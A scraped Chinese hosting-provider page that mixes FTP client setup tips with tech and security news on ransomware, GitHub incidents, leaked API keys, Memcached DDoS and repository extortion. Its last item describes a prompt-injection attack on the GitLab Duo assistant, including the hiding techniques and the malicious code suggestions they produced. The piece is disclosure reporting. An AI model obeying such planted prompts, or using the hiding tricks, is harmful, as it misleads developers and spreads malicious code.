(9.0 KB/秒)  关于FTP Socket不能连接的问题: 用户在使用FTP上传文件时出现无法列表的情况,可能是由于选择在PASV方式下进行上传而导致的。因此,请用户将上传方式改为PORT。相同的软件,版本不同,设置方法也略有不同,因此需要根据实际情况进行设置(若取消pasv后还无法访问,请尝试将pasv前边的“使用防火墙访问”选中后再试一次)。 推荐下载cuteftp5.0 http://downinfo.myhostadmin.net/cuteftp.exe(汉化注册版) 如图: CuteFTP 5.0XP 设置方法: 1、选择编辑-->点击设置 2、选择防火墙-->点击“PASV模式”去掉复选框中的打勾选项-->点击确定 若连接后出现"Data connection closed, transfer aborted ",请将启用防火墙访问选项选中 CuteFtpPro3.X的设置方法: 1、选择工具-->点击全局选项 2、选择连接-->选择数据连接类型为:PORT-->点击确定 其他FTP的设置方法: Cute FTP 3.5英文版:FTP—Settings—Options—Firewall,将“PASV mode”前复选框中的打勾去掉。 Cute FTP3.5中文版:FTP—设置—选项—防火墙,“PASV方式(A)”前复选框中的打勾去掉。 Leap FTP2.7.2:Sites—Site Manager—Advanced,将“Use PASV mode”前复选框中的打勾去掉。 #### FTP可能终结:Chrome即将完全移除对FTP的支持 作为互联网的经典协议之一,FTP(文件传输协议)已经 48 岁了,其最初标准是公布于 1971 年的FRC 114。可是,这种在线文件托管服务已经日渐式微,主要是P2P的冲击以及本身缺乏安全协议的致命硬伤。 事实上,从Chrome59 开始,谷歌就挥刀弱化对FTP页面的支持,在Chrome72 上,FTP链接会强制跳转下载所有内容,而不再提供目录浏览。 全球第一大浏览器布局这么久后,终于要大功告成了。 Chrome团队在博客写道,FTP的使用率已经降至极低的水平,无必要进行安全维护,将很快择机彻底移除支持。 另外,Mozilla也早有类似弱化FTP的讨论,预计Firefox也将追随Chrome的脚步,只是时间节点和具体计划很模糊。 #### GandCrab勒索病毒一年累积总收益高达20亿美元 6月3日 消:近日,“侠盗”病毒作者在论坛上公布了GandCrab勒索病毒传播至今累积总收益已高达 20 亿美元,平均每周获益 250 万美金。 据 360 介绍,“侠盗”病毒从 2018 年开始风靡全球,期间通过暗网的RaaS模式向病毒传播者分发勒索病毒,同时不断更新攻击手段,利用远程桌面爆破、U盘蠕虫、网站挂马、垃圾邮件等方式传播自身,入侵企事业单位及个人电脑,加密文件并勒索赎金。 据分析,该病毒至今能牟利高达 20 亿美金,主要在于感染区域用户的网络安全意识薄弱,缺乏完善的网络安全防护体系。 360官方表示,360 安全大脑已实现针对GandCrab4.0/5.0/5.0.2/5.0.3/5.0.4/5. 1 版本的完美解密,并全面支持针对该病毒全系列的强力查。 #### Garmin遭勒索软件攻击后,被迫支付数百万美元赎金 8月4日 消息:前不久,国外运动和健身科技巨头Garmin曾遭勒索软件攻击导致全球服务中断,黑客勒索 1000 万美元。 据外媒报道,Garmin已经通过第三方公司向黑客支付了“数百万美元的赎金”,以重新获得对其文件和系统的访问权。 据此,该攻击事件导致Garmin数百万用户的在线服务中断,其中包括将用户活动和数据同步到云端和其他设备的Garmin Connect。此次攻击还导致其航空导航和航线规划服务flyGarmin瘫痪。 目前,官方还未透露该攻击事件的幕后黑手,也没有透露向谁支付了赎金。有消息来源证实,“ WastedLocker”勒索软件是这次宕机的罪魁祸首。一些安全研究人员认为,WastedLocker与俄罗斯一家名为Evil Corp的的网络犯罪组织有关联。 网络安全公司Arete则表示,WastedLocker并不是Evil Corp的杰作。 #### Gigaset Android更新服务器遭遇黑客攻击 Gigaset 透露,在其 Android 设备上发现的恶意软件感染事件,是由外部更新服务提供商的服务器遭到黑客攻击而导致的。这家德国电信设备制造商表示,此事似乎可追溯到 3 月 27 日,受影响的智能机型号包括 GS100、GS160、GS170、GS180、GS270(plus)、以及 GS370(plus)等系列。 通过与安装的系统更新 App 下载并安装,这批恶意软件的形式也是五花八门。Gigaset 表示已及时向更新服务提供商发出了警告,并在 4 月 7 日阻断了进一步的感染。 目前 Gigaset 已经为受影响的设备部署了自动清除恶意软件的措施,并建议用户将设备连接到互联网(打开 WLAN 或开启移动数据)和连接至充电器。 如果一切顺利的话,感染恶意软件的设备可在 8 小时内得到恢复。以下是本次 Gigaset 设备上感染的恶意软件完整列表: ●Gem ● Smart ● Xiaoan ● asenf ● Tayase ● com.yhn4621.ujm0317 ● com.wagd.smarter ● com.wagd.xiaoan   此外 Gigaset 敦促用户访问“设置”应用,以检查设备是否存在安装疑似恶意软件的感染迹象,并且确保设备上的其它软件也都更新到了最新版本。 具体受影响的设备型号包括 GS160 / GS170 / GS180 全版本,以及 GS100_HW1.0_XXX_V19、GIG_GS270_S138、GIG_GS270_plus_S139、GIG_GS370_S128 和 GIG_GS370_plus_S128 等最高版本。 除此之外,GS110、GS185、GS190、GS195、GS195LS、GS280、GS290、GX290、GX290plus、GX290 PRO、GS3 和 GS4 系列并未受到本次事件的影响。 #### GitHub 正式发布 iOS / 安卓 App 稳定版:专为触摸屏设计 3 月 18 日消息:此前 GitHub 官方在去年 11 月宣布推出首款移动应用程序,发布了 GitHub App 的 iOS 和 Android 预览测试版。 现在经过数月的开发,适用于移动设备的 GitHub iOS 和 Android 客户端已发布稳定版,用户可从 Google Play 或 App Store 下载安装。 GitHub 移动版客户端采用原生开发,针对移动端提供了专为触摸屏设计的新界面,还提供了通知功能,当用户被直接 @ 的时候,就能够收到悬浮通知,方便开发者随时随地查看代码、合并更改以及共享协作等。 详情查看:https://github.com/mobile #### GitHubu允许开发者创建无限的私有库 自从GitHub卖给微软后,GitHub 不再需要任何盈利计划了,它只需要吸引开发者进驻它的平台,将最大的源代码托管平台变成最大的程序员社交网络。目前GitHub 官方博客宣布,开发者不需要付费就可以创建无限的私有库,这些私有库可用于求职或在公开前私下进行尝试。私有库允许开发者加入最多三名合作者,公开的库则没有任何变动,仍然免费且可以加入任意数量的合作者!这对于程序员来说吸引力还是非常大的。关于GitHubgitHub是一个面向开源及私有软件项目的托管平台,因为只支持git 作为唯一的版本库格式进行托管,故名gitHub。 gitHub于2008年4月10日正式上线,除了git代码仓库托管及基本的 Web管理界面以外,还提供了订阅、讨论组、文本渲染、在线文件编辑器、协作图谱(报表)、代码片段分享(Gist)等功能。目前,其注册用户已经超过350万,托管版本数量也是非常之多,其中不乏知名开源项目 Ruby on Rails、jQuery、python 等。 2018年6月4日,微软宣布,通过75亿美元的股票交易收购代码托管平台GitHub。 #### GitHub为防黑客弃用账密验证 Git 操作,改用 token 或 SSH 密钥 还在用账户 + 密码对 GitHub 上的 Git 操作进行身份验证? 赶紧整个 token(令牌)或 SSH 密钥吧! 8 月 14 号 0 点(8 月 13 日 9:00 PST)开始,在 GitHub 上执行 Git 操作就会导致失败。 GitHub 官方表示,这一举措是为了提高 Git 操作的安全性,防止密码撞库等事情发生。 哪些操作会受影响? 简单来说,如果你还在用账密验证 Git 操作,这些行为都会受到影响: 命令行 Git 访问 采用 Git 的桌面应用程序(GitHub Desktop 不受影响) 账密访问 GitHub 上 Git repo 的一切应用程序/服务 这些用户不会受影响: 已经采用 token 或 SSH 密钥方式验证,即启用双因素身份验证(2FA)的用户 使用 GitHub Enterprise Server 本地产品的用户(该产品尚未对此进行更改) 使用 GitHub App 的用户,此前已经不支持账密验证 当然,大部分经常使用 Git 的用户应该都已经知道这件事了。 在今年 6 月 30 号(15~18 时)、7 月 1 号(0~3 时)、7 月 28 号(15~18 时)和 29 号(0~3 时),GitHub 已经针对这件事进行了预演,所有 Git 操作都被要求用 token 或 SSH 密钥验证。 现在,这项举措已经变成一个永久措施。 GitHub 究竟为什么要这样做呢? token 和 SSH 密钥安全在哪里? 首先需要了解,只用账户和密码进行身份验证会有什么隐患。 互联网上,每天都有大量网站遭受黑客攻击,导致数据外泄,这些数据中就包括不少用户的账号密码。 拿到账号密码后,黑客会用它们试着登录其他网站,也就是所谓的密码撞库。 简单来说,如果你 ABC 网站用的是一套账户密码,在 A 网站的密码被泄露后,BC 网站也可能会被盗号。 为了防止密码撞库,网站会采取更多手段验证身份信息,像 GitHub 就推出了双因素身份验证、登录警报、设备认证、防用泄露密码及支持 WebAuth 等措施。 双因素身份验证,是指在秘密信息(密码等)、个人物品(身份证等)、生理特征(指纹/虹膜/人脸等)这三种因素中,同时用两种因素进行认证的过程。 现在,GitHub 开始强制用户采用 token 或 SSH 密钥进行身份验证。相比于账密,这两者的安全性显然更高: 唯一性:仅限 GitHub 使用,根据设备/使用次数生成 可撤销性:可随时被单独撤销,其他凭证不受影响 区域性:使用范围可控,只允许在部分访问活动中执行 随机性:不受撞库影响,比账密复杂度更高 那么,token 和 SSH 密钥之间,哪个更合适呢? 虽然目前 GitHub 官方推荐的是 token,因为它设置更为简单,不过相比之下,SSH 密钥的安全性要更高一些。 还没有设置 token 或 SSH 密钥的 Git 用户,可以戳官方教程整起来了~ GitHub 设置教程: [1]https://docs.github.com/en/github/authenticating-to-github/keeping-your-account-and-data-secure/creating-a-personal-access-token [2]https://docs.github.com/en/github/authenticating-to-github/connecting-to-github-with-ssh/generating-a-new-ssh-key-and-adding-it-to-the-ssh-agent 参考链接: [1]https://github.blog/changelog/2021-08-12-git-password-authentication-is-shutting-down/ [2]https://www.theregister.com/2021/08/12/git_proxyshell_gigabyte/ #### GitHub今日的宕机事件影响数千名软件开发者 今天上午,GitHub发生服务瘫痪的情况,对于数千名软件开发者来说是一个灾难。这家微软旗下的服务通过Git提供版本控制,并为软件开发提供托管的重要服务宕机一个多小时。故障表现在GitHub用户在登录该服务时出现了错误,一些用户甚至无法使用他们的集成开发环境(IDE),因为软件开发环境与该服务的联系非常紧密。 GitHub表示,它正在调查此次故障,并已经 "确定了错误的来源,正在努力恢复。" GitHub是一个大型的代码仓库,它已经变得非常受欢迎,不少开发者和公司将整个项目和代码托管在该服务上。苹果、亚马逊、谷歌、Facebook和许多其他大型科技公司都在使用GitHub。在GitHub上托管的仓库超过 1 亿个,有 4000 万开发者为其做出贡献。 微软早在 2018 年以 75 亿美元的价格收购了GitHub,并一直在逐步改善对开发者的服务。微软在今年早些时候降低了GitHub最受欢迎的付费层的价格,并至少将其所有付费计划的一个关键特性移入其免费计划当中。 #### GitHub代码库泄露了超过十万个API 或加密密钥 每天成千上万新的API或加密密钥通过GitHub项目泄露出去。 六个月期间扫描GitHub公共代码库总数中13%的数十亿个文件后发现,超过100000个代码库泄露了API令牌和加密密钥,每天数千个新的代码库在泄露新的秘密内容。 这次扫描是北卡罗来纳州立大学(NCSU)的团队开展的一项学术研究的课题,研究结果已交给GitHub,GitHub看到调查结果后采取了行动,加快开发一项名为令牌扫描(Token Scanning)的新安全功能,目前该功能处于测试阶段。 研究人员扫描了数十亿个GitHub文件 NCSU的这项研究是迄今为止对GitHub最全面和最深入的扫描,超过之前的任何同类研究。 2017年10月31日至2018年4月20日,NCSU的研究人员扫描了多个GitHub帐户,扫描时间持续近六个月,寻找API令牌和加密密钥等格式的文本字符串。 他们不仅使用GitHub Search API来寻找这些文本模式,就像之前的其他研究工作一样,还查看了谷歌的BigQuery数据库中记录的GitHub代码库快照。 在这六个月期间,研究人员分析了无数GitHub代码库当中的数十亿个文件。 在上个月发表的一篇研究论文中,NCSU的三人团队表示,他们使用GitHub Search API获取并分析了代表681784个代码库的4394476个文件,以及代表谷歌的BigQuery数据库中记录的3374973个代码库的另外2312763353个文件。 NCSU团队扫描了11家公司的API令牌 研究人员在这庞大的文件堆中寻找采用特定的API令牌或加密密钥格式的文本字符串。 由于并非所有的API令牌和加密密钥都采用同样的格式,因此NCSU团队决定使用15种API令牌格式(来自属于11家公司的15项服务,其中5家来自Alexa Top 50)和4种加密密钥格式。 这包括谷歌、亚马逊、Twitter、Facebook、Mailchimp、MailGun、Stripe、Twilio、Square、Braintree和Picatic使用的API密钥格式。 许多流行API的密钥有着独特的结构,一旦泄密,将导致安全风险。 结果立马出来了,研究项目发现每天数千个API和加密密钥泄露出去。 总的来说,NCSU团队表示他们发现了575456个API和加密密钥,其中201642个具有独特性,它们都散布于100000多个GitHub项目中。 合并数据集中的秘密内容绝大多数被单一所有者使用。 研究团队在学术论文中披露,使用谷歌Search API找到的“秘密内容”和通过谷歌BigQuery数据集发现的“秘密内容”也很少有重叠。 研究人员说:“合并两个数据集后,我们确定这两个数据集中出现了7044个秘密内容,占总数的3.49%。这表明我们的方法在很大程度上是互补的。” 此外,大多数API令牌和加密密钥(93.58%)来自单一所有者帐户,而不是多个所有者代码库。 这意味着NCSU团队发现的绝大多数API和加密密钥很可能是实际环境中使用的有效令牌和密钥,因为多个所有者的帐户通常往往包含用于共享测试环境和开发阶段代码的测试令牌。 泄露的API和加密密钥停留数周 由于研究项目是在六个月的期间内进行,研究人员还有机会观察帐户所有者是否以及何时认识到自己泄露了API和加密密钥,并从代码中删除敏感数据。 该团队表示,他们跟踪的API和加密密钥中有6%在泄露后一小时内被删除,这表明这些GitHub所有者立马意识到了所犯的错误。 超过12%的密钥和令牌一天后消失,而19%的密钥和令牌最多停留了16天。 研究人员说:“这也意味着我们发现的秘密内容中81%没有被删除。这81%秘密内容的开发人员很可能不知道秘密内容被泄露,或者低估了泄露的风险。” 短期和长期监测秘密内容 研究团队发现了一些重大泄露 研究人员开始研究其中一些内容是从何处泄露时,这种扫描的重要性显露出来。 NCSU团队说:“有一次,我们发现了我们认为是美国数百万大学申请者所依赖的一大网站的AWS登录信息,可能是由承包商泄露的。” “我们还找到了一个西欧国家的主要政府机构的网站的AWS登录信息。在这种情况下,我们能够证实该帐户的有效性,甚至证实提交秘密内容的特定开发商。该开发商在网上声称拥有近10年的开发经验。” 在另一个案例中,研究人员还发现了564个谷歌API密钥,这些密钥被一家在线网站用来规避YouTube的速率限制,并下载以后托管在另一个视频共享门户网站上的YouTube视频。 NCSU的研究人员说:“由于密钥数量非常多,我们怀疑(但无法确认)这些密钥可能是以欺诈手段获得的。” 最后但并非最不重要的是,研究人员还在OpenVPN配置文件中发现了7280个RSA密钥。研究人员发现,通过分析这些配置文件中的其他设置,绝大多数用户禁用了密码身份验证,完全依赖RSA密钥进行身份验证,这意味着凡是发现这些密钥的人都可以访问成千上万的私密网络。 研究人员使用其他API令牌扫描工具分析他们自己的数据集以确定扫描系统的效率时,扫描结果的高质量也显露无遗。 研究团队说:“我们的研究结果表明,TruffleHog在检测机密内容基本上无效,因为它的算法只检测到我们的Search数据集中25.236%的秘密内容和BigQuery数据集中29.39%的秘密内容。” GitHub获悉后忙于补救 北卡罗来纳州立大学计算机科学系助理教授Brad Reaves今天接受ZDNet的采访时表示,他们在2018年将这项研究的结果告知了GitHub。 Reaves说:“我们与GitHub讨论了结果。对方启动了一个内部项目,几乎就在我们完成研究的同时,检测并告知开发人员泄露的秘密内容。该项目于2018年10月公开承认。” “我们被告知GitHub在监测研究文档中列出的秘密内容之外的更多秘密内容,但我们没有获得进一步的细节。” Reaves补充道:“由于这种类型的泄露很普遍,我们很难通知所有受影响的开发人员。我们面临的诸多挑战之一就是,我们根本无法获得大批GitHub开发人员的安全联系信息。” “在我们的论文发表时,我们试图与GitHub合作以通知开发人员,但考虑到我们的令牌扫描与GitHub的有重叠,他们觉得没必要另外通知。” API密钥泄露是已知问题 开发人员在众多应用程序和网站的源代码中留下API和加密密钥,这不是什么新问题。亚马逊已敦促互联网开发人员扫描代码,从早至2014年的公共代码库中删除任何AWS密钥,甚至发布了一个工具来帮助他们向公共代码库提交任何代码之前扫描代码库。 一些公司已主动负起责任,扫描GitHub及其他代码共享库,查找无意中泄露的API密钥,抢在API密钥所有者注意到泄露或滥用之前撤销令牌。 NCSU开展这项研究是为了最深入地研究这个问题。 Reaves称:“研究结果表明,开源软件代码库中的登录信息管理对于新手和专家来说仍然具有挑战性。”   作者微信公众号:云头条 #### GitHub宕机 确认数据存储系统存在问题 10 月 22 日讯,引述cnBeta的消息,从欧洲夏令时 02:09 开始,GitHub 团队开始收到不断上升的错误报告。由服务状态页面可知,许多客户都无法使用 GitHub 服务,甚至访问官网首页都会遇到问题。 GitHub 团队表示,数据存储系统是导致本次故障的罪魁祸首。为尽快恢复服务,他们正在努力修复。 #### GitHub屏蔽中国IP?回应称配置更改所致! 今天有小伙伴称国际知名代码托管平台GitHub在国内无法访问,疑似屏蔽中国IP。但已登录用户仍然可以正常访问网站。 有小伙伴怀疑是美国针对中国科技圈的又一打压动作。 对此GitHub 官方解释称:此次访问受限并非针对特定国家或地区,而是由于“配置更改”所带来的意外影响。相关配置问题目前已被撤回,用户在访问网站时“不应再遇到类似问题”。 目前主机帮访问GitHub 已正常。 #### GitHub新规:可托管安全漏洞和恶意程序代码 一个月前,GitHub 开始和社区讨论对安全研究、恶意软件和漏洞相关政策的调整,目的是启用、欢迎和鼓励 GitHub 上双重用途安全研究和合作。这个讨论得到了安全研究社区、项目维护者和开发者的广泛支持,他们通过 pull request(PR)分享了反馈意见,并针对这个主题进行了深入的探讨。 GitHub 根据社区的反馈意见,对政策进行了一些关键性变化: ● 明确允许双重用途的安全技术和与研究漏洞、恶意软件和漏洞有关的内容。 GitHub 表示许多安全研究项目是双重用途的,并且对安全社区广泛有益。我们假定这些项目有积极的意图,并用于促进和推动整个生态系统的改进。这一变化修改了之前可能被误解为对双重用途项目有敌意的宽泛语言,澄清了这类项目是受欢迎的。 ● 明确 GitHub 的相关措施 如果发现利用 GitHub 平台进行漏洞或恶意软件内容交付网络(CDN)的攻击,GitHub 明确了如何以及何时中止这些行为。Github 不允许使用该平台来直接支持造成技术损害的非法攻击,我们进一步将其定义为过度消耗资源、物理损坏、停机、拒绝服务或数据丢失。 ● 有上诉和恢复程序 GitHub 允许用户对限制其内容或账户访问的决定提出上诉。这在安全研究方面尤其重要,所以我们已经非常清楚和直接地指出,受影响的用户可以对针对其内容采取的行动提出上诉。 ● 相关建议 GitHub 提出了一种方法,让各方在向GitHub报告滥用行为之前可以解决争端。这以建议的形式出现,即利用项目的可选SECURITY.md文件来提供联系信息以解决滥用报告。这样可以鼓励社区成员直接与项目维护者解决冲突,而不需要正式的 GitHub 滥用报告。   #### Github更新用户协议 开源代码也要受美国出口管制 这几天围绕华为被制裁一事网上掀起了轰轰烈烈的讨论,国内科技公司对美国公司的芯片及软件都有很强的依赖性,美国政府部门的禁令一出,谷歌、微软、Intel、高通等公司不得不停止对华为供应芯片及软件。 尽管华为今天获得了美国政府部门的 90 天临时许可, 8 月底之前还可以继续进口芯片、软件,但是这个限制只要不最终取消,芯片、软件依然是华为公司的达摩克里斯之剑。 更让人担心的是,这件事的影响不止于此,全球最大的代码托管平台Github日前也突然更新了用户协议,表示Github企业服务器及用户上传的信息要接受美国法律监管,包括美国的出口管制法律。 目前被限制出售、出口或者再出口的国家主要是古巴、伊朗、朝鲜、苏丹与叙利亚,暂时还没有中国,但是这个名单是随时都有可能变化的,一旦中国被列入,那么对使用Github托管代码的公司来说就会有影响了。 软件代码不同于常规产品,理论上只要有网络就不可能彻底封杀,但是Github为代码的代码托管对很多软件公司来说很重要,万一被限制访问了对公司正常运营势必会产生影响。 从芯片到操作系统再到现在的源代码,华为被封杀这件事应该要对国内的科技公司敲个警钟长鸣了,正如华为海思启用备胎计划一样,任何100%依赖外部的做法都是极具风险的。 Github用户协议网址如下: https://help.github.com/en/articles/github-and-export-controls #### GitHub被DDoS攻击新变化 Memcached 漏洞可窃取服务器数据 Corero 网络安全公司近日披露,在上周引起 GitHub DDoS 攻击的 Memcached 漏洞比最初报道的更为糟糕。现在发现,该漏洞可用于窃取或修改 Memcached 服务器中的数据。Memcached 是一个开源系统,可将数据存储在内存中以加快访问速度。 目前曝出的漏洞是攻击者通过设置 Memcached 的最大值,欺骗 UDP 数据包发起请求,利用 Memcached 发送的大量庞大的 UDP 响应数据包进行攻击行为。 据 Corero 的说法,任何可用于 DDoS 攻击的 Memcached 服务器也可用于收集从本地网络或主机缓存的用户数据。该公司表示,除了窃取用户数据外,攻击者还可以在让所有者不知情的情况下,修改数据并将其重新插入缓存中。 Corero 首席执行官 Ashley Stephenson 表示,“ Memcached 此漏洞代表了 DDoS 攻击的新篇章。在此之前,最新的破纪录攻击是由相对低带宽的物联网(IoT)设备组织的。相比之下,这些 Memcached 服务器通常连接到更高带宽的网络,并且由于高放大因素,容易造成数据雪崩等严重影响。除非 Memcached 服务器的运营商采取行动,否则这些攻击将继续。” 由于 Memcached 协议旨在不需要身份验证就可以使用,因此用户向易受攻击的 Memcached 服务器添加的任何内容都可能被互联网上的其他人盗用,而不会留下审计跟踪。 Memcached 近日发布了 1.5.6 版本,以默认禁用 UDP 协议。其开发者社区也发布了多个有关安全风险的警告,不过仍然有大量用户使用的是之前的版本,以及操作系统和云服务的默认配置。该公司还宣布了针对该攻击的“kill switch”对策,通过发送一个命令回攻击服务器来抑制 DDoS 攻击并使服务器的缓存失效。并表示该对策已在经过测试,似乎 100% 有效。 #### GitHub被曝安全漏洞,可被黑客利用伪装成“微软”分发恶意软件 4 月 23 日消息,代码托管网站 GitHub 被曝高危严重漏洞,存在于 comment 文件上传系统中,黑客利用该漏洞可以分发各种恶意软件。 用户可以将文件上传到指定 GitHub comment 中(即便该条 comment 并不存在),也会自动生成下载链接。此链接包括存储库的名称及其所有者,可能会诱使受害者认为该文件是合法的。 而且该漏洞并不需要任何复杂的专业技术,只需要上传恶意文件到指定 comment 即可。攻击者可以在任何受信任的存储库中上传恶意软件,然后通过 GitHub 链接进行分发。 而且这些链接属于 GitHub 官方 URL 域名,且后缀是“Microsoft”等官方储存库,因此用户很大几率认为该 URL 下载链接的内容是正规安全的。 GitHub 目前已经删除了部分恶意软件链接,对尚未完全修复该漏洞。对于开发者而言,现阶段没有足够有效的方法阻止这种滥用,唯一的方案就是完全禁用 comment。 #### GitHub遭攻击!黑客:不交比特币,就公开用户代码 程序员的大本营被黑客攻击了! 就在五一假期的最后一天,一些程序员查看自己托管到GitHub上的代码时发现,他们的源代码和Repo都已消失不见,取而代之的是黑客留下的一封勒索信! 这封信中表示,他们已经将源代码下载并存储到了自己的服务器上。 受害者要在 10 天之内,往特定账户支付0. 1 比特币(约合人民币 3800 元),否则他们将会公开代码,或以其他的方式使用它们。 “要找回你丢失的代码并避免代码泄漏:将0. 1 比特币(BTC)发送至我们的比特币地址1ES14c7qLb5CYhLMUekctxLgc1FV2Ti9DA,并通过邮件与我们联系,提供您的git登录信息和付款证明。地址为admin[at]gitsbackup[dot]com。 如果你不确定我们是否有你的数据,请联系我们,我们会给你发送证明。你的代码已经被下载并备份到我们的服务器上。 如果我们在接下来的 10 天内没有收到你的付款,我们将公开你的代码或以其他方式使用它们。” 从这个威胁话语来看,受到攻击的是GitHub上的私有库。而且,不仅仅是GitHub,其他代码托管网站GitLab、Bitbucket也受到了攻击。 突如其来的攻击 根据GitHub上的搜索数据显示,一共有 373 名用户受到了攻击。根据GitLab公布的数据,黑客至少可以访问所有 131 个用户和 163 个存储库。 这些受到攻击的储存库的代码和提交信息,全都被一个名为 “gitbackup” 的账号删除。 在各大社交媒体上,一些受害者将遭到攻击归咎于Atlassian开发的Git GUI应用程序SourceTree,认为黑客利用了其中的漏洞。 但攻击波及的范围涵盖多个平台,The Register报道称,这次攻击很可能是针对无意识的安全性较差的存储库,而不是特定的漏洞。 根据ZdNet报道,黑客可能是扫描互联网上的Git配置,然后提取了其中的登录凭证登录Git库,来完成的这波操作。 截止到发稿时间,还没有人向攻击者的比特币账户支付赎金。取而代之的是,这一比特币地址遭到了不少举报。 根据Bitcoin Abuse数据库显示,已经有 31 人举报了这一比特币地址,表示对方是一个黑客,希望删除地址。 ZdNet记者Catalin Cimpanu表示,攻击现在已经停止,并没有新的账户被攻击的情况出现。 遭到攻击不要慌 根据GitLab的官方声明,这次黑客攻击事件最大的问题在用户: “我们有充分证据表明,受影响帐户的密码以明文形式存储在相关代码库的部署中。” 因此提高安全意识才是保护自己代码的最好方法,GitLab建议用以下方法防止密码被黑客盗取: 1、使用强密码,降低被黑客破解的风险; 2、用密码管理工具存储密码,不要使用明文; 3、开启双因素身份验证,并使用SSH密钥提高。 如果你已经不幸中招,也不要急着交赎金,因为即使交钱也无法保证代码不会被黑客公开。 至于已经被删除的代码,一位早期受害者在StackExchange论坛指出,代码其实还在,是可以恢复出来的,只是HEAD被黑客修改了而已。 他还给出了一系列补救办法,被GitLab官方推荐。 输入以下代码: git checkout origin/master git reflog # take the SHA of the last commit of yours git reset [SHA] 能看到黑客的提交记录,并修复origin/master。但是问题还没有完全解决,如果输入git status,还是会显示: HEAD detached from origin/master 如果你在本地备份了代码,那就好办了,直接把本地代码强制push上去: git push origin HEAD:master --force 如果你在本地没有备份,仍然可以从远程库克隆,用git reflog或者git fsck可以找到最后一次提交并更改HEAD。 接下来唯一需要担心的可能就是黑客是否会公布你的私有代码了。 代码被公开之痛 关于代码被公开,国内一些公司也有切肤之痛。 比如大疆,其一名前员工,将含有公司商业机密的代码上传到了GitHub的公有仓库中,造成源代码泄露。 根据这些源代码,攻击者可以SSL证书私钥,访问客户的敏感信息,比如用户信息、飞行日志等等。 根据评估,这次泄漏代码一共给大疆造成了116. 4 万的经济损失。 前不久,关于这一代码泄露事件也得到了判决: “有期徒刑六个月,并处罚金 20 万。” 最近,B站的源代码也被人公开到GitHub,虽然很快被封禁,B站也已经报警处理,但有不少网友克隆了代码库,隐患已经埋下,补救起来也颇为头疼。 如果黑客公开了这次获取的所有代码,对其中一些小团队来说可能就是灭顶的打击了。 来源:https://mp.weixin.qq.com/s/GfLauN3bbFgjfLuioz7A1w #### GitHub遭遇中间人攻击,访问报SSL证书错误 截至发稿,国内访问 GitHub 网站会报证书错误,如下图所示: 据了解,GitHub 疑似遭到了中间人攻击。 中间人攻击(英语:Man-in-the-middle attack,缩写:MITM)在密码学和计算机安全领域中是指攻击者与通讯的两端分别创建独立的联系,并交换其所收到的数据,使通讯的两端认为他们正在通过一个私密的连接与对方直接对话,但事实上整个会话都被攻击者完全控制。在中间人攻击中,攻击者可以拦截通讯双方的通话并插入新的内容。在许多情况下这是很简单的(例如,在一个未加密的 Wi-Fi 无线接入点的接受范围内的中间人攻击者,可以将自己作为一个中间人插入这个网络)。 中间人攻击能成功的前提条件是攻击者能将自己伪装成每一个参与会话的终端,并且不被其他终端识破。中间人攻击是一个(缺乏)相互认证的攻击。大多数的加密协议都专门加入了一些特殊的认证方法以阻止中间人攻击。例如,SSL 协议可以验证参与通讯的一方或双方使用的证书是否是由权威的受信任的数字证书认证机构颁发,并且能执行双向身份认证。 简而言之,所谓的中间人攻击就是通过拦截正常的网络通信数据,并进行数据篡改和嗅探,而通信的双方却毫不知情。 目前访问 GitHub 提示的这个不受信任的证书的颁布者是 346608453@qq.com。 另据多名网友反馈,京东、koajs 等网站同样出现该问题,同样无效证书来自于该 QQ 邮箱,有人怀疑该疑似攻击者为黑客初学者,而攻击目的很有可能只是在练习/测试。 #### GitHub遭遇史上最严重DDos攻击,Memcached究竟是什么鬼? 近日,程序员圈炸了锅,知名代码托管网站GitHub遭遇了有史以来最严重的DDos网络攻击,峰值流量达到1.35Tbps。GitHub以“代码分享+程序员垂直社交”、“”企业代码管理“为主要功能,拥有上百万的开发者程序员,堪称最大的程序员聚集地。据百度安全指数监测,截至3月5日9:00,国内已有27396个网站受到影响,其中广东、北京、安徽三个省市为重灾区。 影响还在持续,百度安全正在持续监控中,详见“百度安全指数播报”。究竟是什么攻击敢在太岁头上动土? 据外媒透露,攻击者是利用前不久公开的Memcached漏洞进行DDoS攻击,引发广泛关注。其利用memcached协议,发送大量带有被害者IP地址的UDP数据包给放大主机,然后放大主机对伪造的IP地址源做出大量回应,从而形成DRDoS(分布式反射拒绝服务)攻击。 百度安全指数将此漏洞定义为“高危”。 【关于DDoS反射攻击】 攻击者,伪造被攻击目标IP,发送海量伪造请求到反射服务器。 反射服务器,需要满足2个条件,第一,上面运行存在漏洞名的UDP协议服务,能够满足特定条件下,响应包远远大于请求包。第二,该协议或服务在互联网上有一定的使用量,如DNS,NTP等基础服务。 【关于Memcache反射】 由于Memcache同时监听TCP和UDP,满足反射DDoS条件。 Memcache作为企业应用组建,具有较高外发带宽。 Memcache不需要认证即可进行交互。 很多用户在编译安装时,将服务错误监听在0.0.0.0,且未进行安全策略配置。 【百度安全修复建议】 1、Memcache的用户建议: 在不使用UDP的情况下禁用UDP支持,在memcached启动时,您可以指定--listen 127.0.0.1仅侦听本地主机并-U 0完全禁用UDP。将服务放置于内部网络内,确实有外网访问需求设置ACL。 2、ISP服务商基于网络针对UDP协议的11211端口进行速率限制。 #### GitLab AI 助手曝高危提示词注入漏洞 黑客可绕过检测植入恶意代码 5 月 27 日消息,安全公司 Legit Security 发文,披露 GitLab 的 AI 助手 GitLab Duo 存在一项提示词注入漏洞,黑客可以通过嵌入提示(prompt injection)的方式,让 GitLab Duo 输出任何黑客想要实现的内容。 据介绍,GitLab Duo 是一款基于 Anthropic 开发的大语言模型 Claude 构建的 AI 助手,于 2023 年 6 月推出,2024 年 4 月又新增了 Duo Chat 聊天机器人功能,让用户能够通过自然语言与之交互。这款助手可为开发者提供代码建议、代码审核、分析合并请求等功能。 Legit Security 报告获悉,该公司在 GitLab Duo 中发现了一处远程提示注入漏洞,黑客可以在 GitLab 项目中提前埋入恶意提示信息,为了躲避安全系统的检测,研究人员采用了 Unicode 夹带(Unicode Smuggling)、Base16 编码、KaTeX 渲染等手法,使这些提示内容不会直接出现在网站上被用户察觉,但 Duo 在生成建议时依然会读取到。 安全公司指出,相应提示内容可篡改 Duo 生成的代码建议(例如指示 AI 在输出中加入恶意 JavaScript 包)、在 Duo 回应中嵌入恶意链接,或让 Duo 错误地认为恶意合并请求是安全的,从而达成黑客各种特殊目的。 目前,相应公司已于今年 2 月将这一问题通报给 GitLab,GitLab 随后确认漏洞并完成了修复。 #### GitLab 已停止直接为(中国区用户)提供服务 12月25日消息,GitLab 已宣布将停止为中国大陆、澳门和香港的用户提供 GitLab.com 